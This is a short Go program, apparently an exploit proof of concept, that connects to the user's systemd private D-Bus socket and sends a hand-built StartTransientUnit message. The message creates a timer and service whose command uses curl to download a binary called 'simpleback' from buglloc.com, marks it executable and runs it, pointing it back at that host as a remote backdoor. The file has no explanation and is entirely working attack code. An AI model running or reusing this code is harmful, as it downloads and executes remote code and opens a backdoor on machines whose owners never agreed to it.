package main

import (
	"fmt"
	"io"
	"log"
	"net"
	"os"
	"sync"
	"time"
)

var (
	AuthMsg           = []byte{0x00, 0x41, 0x55, 0x54, 0x48, 0x20, 0x45, 0x58, 0x54, 0x45, 0x52, 0x4e, 0x41, 0x4c, 0x0d, 0x0a, 0x44, 0x41, 0x54, 0x41, 0x0d, 0x0a, 0x4e, 0x45, 0x47, 0x4f, 0x54, 0x49, 0x41, 0x54, 0x45, 0x5f, 0x55, 0x4e, 0x49, 0x58, 0x5f, 0x46, 0x44, 0x0d, 0x0a, 0x42, 0x45, 0x47, 0x49, 0x4e, 0x0d, 0x0a}
	StartTransientMsg = []byte("l\x01\x04\x01\xe4\x02\x00\x00\x01\x00\x00\x00\xb6\x00\x00\x00\x01\x01o\x00\x19\x00\x00\x00/org/freedesktop/systemd1\x00\x00\x00\x00\x00\x00\x00\x03\x01s\x00\x12\x00\x00\x00StartTransientUnit\x00\x00\x00\x00\x00\x00\x02\x01s\x00 \x00\x00\x00org.freedesktop.systemd1.Manager\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01s\x00\x18\x00\x00\x00org.freedesktop.systemd1\x00\x00\x00\x00\x00\x00\x00\x00\b\x01g\x00\x10ssa(sv)a(sa(sv))\x00\x00\x00+\x00\x00\x00run-rc6edb2c766524889974e0dfc077ac6c1.timer\x00\x04\x00\x00\x00fail\x00\x00\x00\x00\xe8\x00\x00\x00\x0b\x00\x00\x00Description\x00\x01s\x00\x00\x89\x00\x00\x00/bin/bash -c curl http://buglloc.com:22/simpleback -o /tmp/simpleback && chmod +x /tmp/simpleback && /tmp/simpleback -addr buglloc.com:22\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00RemainAfterElapse\x00\x01b\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00OnActiveSec\x00\x01t\x00\x00\x00\x00\x00\x00@B\x0f\x00\x00\x00\x00\x00\xb4\x01\x00\x00\x00\x00\x00\x00-\x00\x00\x00run-rc6edb2c766524889974e0dfc077ac6c1.service\x00\x00\x00|\x01\x00\x00\x0b\x00\x00\x00Description\x00\x01s\x00\x00\x89\x00\x00\x00/bin/bash -c curl http://buglloc.com:22/simpleback -o /tmp/simpleback && chmod +x /tmp/simpleback && /tmp/simpleback -addr buglloc.com:22\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00ExecStart\x00\x07a(sasb)\x00\x00\xb4\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00/bin/bash\x00\x00\x00\x99\x00\x00\x00\t\x00\x00\x00/bin/bash\x00\x00\x00\x02\x00\x00\x00-c\x00\x00|\x00\x00\x00curl http://buglloc.com:22/simpleback -o /tmp/simpleback && chmod +x /tmp/simpleback && /tmp/simpleback -addr buglloc.com:22\x00\x00\x00\x00\x00\x00\x00\x00")
)

func reader(wg *sync.WaitGroup, r io.Reader) {
	wg.Add(1)

	buf := make([]byte, 1024)
	for {
		n, err := r.Read(buf[:])
		if err != nil {
			wg.Done()
			return
		}

		fmt.Printf("incoming: %q\n", string(buf[0:n]))
	}
}

func main() {
	c, err := net.Dial("unix", fmt.Sprintf("/var/run/user/%d/systemd/private", os.Getuid()))
	if err != nil {
		log.Fatal("Dial error", err)
	}
	defer func() { _ = c.Close() }()

	wg := sync.WaitGroup{}
	go reader(&wg, c)

	if _, err = c.Write(AuthMsg); err != nil {
		log.Fatal("Auth request error:", err)
	}

	time.Sleep(time.Second * 1)
	if _, err = c.Write(StartTransientMsg); err != nil {
		log.Fatal("StartTransientUnit request error:", err)
	}

	wg.Wait()
}
